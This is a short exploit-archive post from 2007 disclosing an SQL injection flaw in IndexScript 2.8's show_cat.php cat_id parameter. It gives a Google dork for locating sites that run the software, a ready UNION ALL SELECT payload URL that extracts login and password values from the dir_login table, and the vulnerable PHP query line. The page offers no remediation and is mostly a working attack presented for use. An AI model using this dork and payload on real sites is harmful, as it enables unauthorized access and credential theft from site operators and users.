IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection Vulnerability
# Published : 2007-07-25
# Author : xssvgamer
# Previous Title : Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities
# Next Title : Confixx Pro <= 3.3.1 (saveserver.php) Remote File Inclusion Vulnerability

Site: http://indexscript.com
Found By: xssvgamer

Google Dork: allintext: "This site is powered by IndexScript"

exploit:

http://www.example.com/show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*

Blind SQL injection in indexscript..

Vul Code:
"$sql = "select name, meta_title, meta_description, meta_keywords from dir_cat where " .
 "cat_id=" . fnpreparesql($_GET['cat_id']);"

# www.Syue.com [2007-07-25]